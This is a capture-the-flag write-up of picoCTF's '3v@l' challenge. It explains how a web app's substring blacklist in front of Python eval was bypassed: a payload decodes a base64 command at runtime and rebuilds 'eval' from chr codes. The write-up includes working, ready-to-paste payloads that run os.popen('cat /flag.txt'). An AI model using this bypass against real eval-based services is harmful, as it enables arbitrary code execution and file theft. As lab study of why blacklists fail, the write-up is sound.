A vulnerable loan calculator passed user-supplied expressions to Python's `eval`. Its only defense was a textual blacklist of dangerous keywords, applied to the submitted payload but not to strings constructed at runtime. That made it possible to submit an innocuous-looking payload that decodes a string at runtime and executes it, and the decoded string reads /flag.txt.



- Platform: picoCTF
- Challenge: 3v@l
- Difficulty: Medium



Recon — understanding the app

The web app has two relevant pages:

- `index`: a form with a textarea where you submit an expression.
- `/execute`: accepts the POST and displays the evaluation result.



I confirmed the server stack in two ways:

1- Inspecting response headers (browser devtools) showed Werkzeug/3.0.6 Python/3.8.10.

2- A quick probe payload:

`().__class__.__name__` returned `tuple`, confirming a Python evaluation environment.

Initial probing

I first verified the evaluator actually executed expressions and how it handled multi-line input:

- `1+1` → `2`
- Submitting multiple lines caused a Python syntax error (so the evaluator expects a single expression).
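Assuming the app hands the textarea contents straight to Python's built-in `eval()` (the server code is not shown in this write-up), the single-expression behavior follows from `eval()` accepting exactly one expression. A minimal local sketch; `try_eval` is a hypothetical helper, not part of the challenge:

```python
def try_eval(source: str):
    """Mimic an eval()-based evaluator: return (True, value) or (False, error text)."""
    try:
        return True, eval(source)
    except SyntaxError as exc:
        # eval() parses its input as a single expression, so a second line is rejected.
        return False, f"SyntaxError: {exc.msg}"


print(try_eval("1+1"))       # (True, 2)
print(try_eval("1+1\n2+2"))  # False plus a SyntaxError message (wording varies by version)
```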

I then attempted obvious file-reading payloads and noted the server rejected payloads containing certain keywords:

- `open('/flag.txt').read()` → Error: Detected forbidden keyword ''
- `__import__('os').popen('cat /flag.txt').read()` → Error: Detected forbidden keyword 'os'
- `__import__('subprocess').check_output(['cat','/flag.txt']).decode()` → Error: Detected forbidden keyword 'cat'

I also ran this to enumerate available subclasses (useful fallback info):

`[i.__name__ for i in ().__class__.__base__.__subclasses__()][:50]`

This returned a list of Python internal types and objects: nothing unexpected, but useful to know.

Result: `['type', 'weakref', 'weakcallableproxy', 'weakproxy', 'int', 'bytearray', 'bytes', 'list', 'NoneType', 'NotImplementedType', 'traceback', 'super', 'range', 'dict', 'dict_keys', 'dict_values', 'dict_items', 'dict_reversekeyiterator', 'dict_reversevalueiterator', 'dict_reverseitemiterator', 'odict_iterator', 'set', 'str', 'slice', 'staticmethod', 'complex', 'float', 'frozenset', 'property', 'managedbuffer', 'memoryview', 'tuple', 'enumerate', 'reversed', 'stderrprinter', 'code', 'frame', 'builtin_function_or_method', 'method', 'function', 'mappingproxy', 'generator', 'getset_descriptor', 'wrapper_descriptor', 'method-wrapper', 'ellipsis', 'member_descriptor', 'SimpleNamespace', 'PyCapsule', 'longrange_iterator']`

Inference: the server performs a blacklist (substring) scan on the submitted source text and blocks certain keywords (os, cat, open, ls, eval, exec, etc.). Importantly, the blacklist only inspects the submitted source text; strings built at runtime (e.g. via base64 decoding or `chr` construction) were not scanned.
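To make this inference concrete, here is a hypothetical reconstruction of such a filter. The keyword list only contains words mentioned in this write-up; the app's real list, its order, and its error handling are unknown. The sketch shows that a substring scan of the submitted text catches the direct payload but not the same code hidden in base64:

```python
import base64

# Hypothetical blacklist: keywords mentioned in this write-up, not the app's real list.
BLACKLIST = ["os", "cat", "open", "ls", "eval", "exec"]


def find_forbidden(source: str):
    """Return the first blacklisted keyword that appears as a substring, or None."""
    for word in BLACKLIST:
        if word in source:
            return word
    return None


direct = "__import__('os').popen('cat /flag.txt').read()"
encoded = base64.b64encode(direct.encode()).decode()
wrapped = f"__import__('base64').b64decode('{encoded}')"

print(find_forbidden(direct))   # os
print(find_forbidden(wrapped))  # None: the scan never sees the decoded text
```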

Strategy

Because the blacklist blocks dangerous tokens in the submission but not strings produced at runtime, the plan was:

1- Submit only safe characters/strings that bypass the blacklist.

2- At runtime, construct the dangerous call as a string (e.g. __import__('os').popen('cat /flag.txt').read()), decode it from base64 (or build it via chr), then execute it.

3- Avoid the literal text eval or exec in the submitted payload (those were blocked). Instead, build eval or exec at runtime with chr() and call it through the builtins dictionary.
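Both encodings from step 2 are plain round trips, so they can be checked locally before anything is submitted. A minimal sketch; `to_chr_codes` and `to_b64` are hypothetical helper names, and the sample expression is a harmless stand-in:

```python
import base64


def to_chr_codes(text: str) -> list:
    """Code points that ''.join(map(chr, codes)) turns back into text."""
    return [ord(c) for c in text]


def to_b64(text: str) -> str:
    """ASCII base64 of text, safe to embed inside a quoted string literal."""
    return base64.b64encode(text.encode()).decode()


codes = to_chr_codes("exec")
print(codes)                     # [101, 120, 101, 99]
print("".join(map(chr, codes)))  # exec

sample = "sum([1, 2, 3])"
print(base64.b64decode(to_b64(sample)).decode() == sample)  # True
```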

This approach leverages two observations:

- `__import__('base64').b64decode(...)` is allowed, and the decoded result is not filtered.
- `builtins` and `__dict__` can be used to access callable objects by name, which lets us avoid forbidden literal keywords.
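The second observation relies on `__import__('builtins')` returning the `builtins` module, whose `__dict__` maps names such as `eval` and `exec` to the actual builtin functions. A quick check in a normal local interpreter (not through the challenge):

```python
import builtins

# Build the key at runtime so the literal name never appears in the payload text.
key = "".join(map(chr, [101, 118, 97, 108]))  # "eval"

# __import__('builtins') yields the same module object as the import above.
mod = __import__("builtins")
fn = mod.__dict__[key]

print(mod is builtins)      # True
print(fn is builtins.eval)  # True
print(fn("2 ** 10"))        # 1024
```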

Proof-of-concept payloads (worked interactively)

1- Confirm that base64-decoded strings are not scanned. I submitted:

`__import__('base64').b64decode('<base64-of-__import__(\'os\').popen(\'id\').read()>')`

The server returned the decoded bytes, demonstrating that the blacklist did not examine decoded runtime strings.

2- Attempting eval directly failed

This payload was blocked:

`eval(__import__('base64').b64decode('<...>').decode())`

Server response: Error: Detected forbidden keyword 'eval'.

3- Using exec constructed at runtime

Constructing `exec` from `chr()` and calling it executed the decoded command, but `exec(...)` returns `None`, so the page showed `None`:

`__import__('builtins').__dict__[''.join(map(chr,[101,120,101,99]))](__import__('base64').b64decode('<base64>').decode())`

The decoded string ran, but its output never reached the page.
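The `None` on the page is standard Python behavior: `exec()` runs code for its side effects and always returns `None`, while `eval()` returns the value of the expression. A harmless local comparison, fetching both functions by a `chr`-built name as the payload does:

```python
import builtins

# Fetch exec and eval by names assembled from code points, mirroring the payload.
run_exec = builtins.__dict__["".join(map(chr, [101, 120, 101, 99]))]
run_eval = builtins.__dict__["".join(map(chr, [101, 118, 97, 108]))]

source = "6 * 7"
print(run_exec(source))  # None: the expression is evaluated, but its value is discarded
print(run_eval(source))  # 42
```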



4- Final working payload — construct and call eval at runtime

To get the decoded expression evaluated and the result returned (so the page shows the flag), I constructed eval from chr() at runtime and passed the decoded expression to it.

Final payload (single line, ready to paste into the textarea):

`__import__('builtins').__dict__[''.join(map(chr,[101,118,97,108]))](__import__('base64').b64decode('X19pbXBvcnRfXygnb3MnKS5wb3BlbignY2F0IC9mbGFnLnR4dCcpLnJlYWQoKQ==').decode())`

- The base64 string decodes to `__import__('os').popen('cat /flag.txt').read()`.
- The `builtins` lookup builds the string `"eval"` at runtime from the `chr` values for e, v, a, l, so the literal `eval` never appears in the submitted text.
- `eval(...)` executes the decoded expression and returns its result, the contents of `/flag.txt`, which the `/execute` page then displayed.
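The final payload can be regenerated and sanity-checked for any expression with a small builder. `build_payload` is a hypothetical helper written for illustration, not something from the challenge; the local run evaluates a harmless expression instead of the file read:

```python
import base64


def build_payload(expression: str) -> str:
    """Wrap an expression in the base64 + chr-built-eval pattern of the final payload."""
    encoded = base64.b64encode(expression.encode()).decode()
    codes = ",".join(str(ord(c)) for c in "eval")  # 101,118,97,108
    return (
        f"__import__('builtins').__dict__[''.join(map(chr,[{codes}]))]"
        f"(__import__('base64').b64decode('{encoded}').decode())"
    )


flag_payload = build_payload("__import__('os').popen('cat /flag.txt').read()")
print("eval" in flag_payload)  # False: the literal never appears in the submission

# Evaluating a generated payload locally runs the wrapped (harmless) expression.
print(eval(build_payload("sum([1, 2, 3])")))  # 6
```

Comparing `flag_payload` with the string pasted into the textarea is a cheap way to catch copy-paste mistakes in the base64.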

Why this works

- The app uses `eval` on user input, an inherently dangerous primitive.
- The server uses a blacklist of substrings to block dangerous words in the submitted payload, but does not analyze strings produced at runtime.
- Building dangerous tokens at runtime (via base64 decoding or `chr`-based string assembly) bypasses the blacklist while still letting the attacker execute arbitrary code.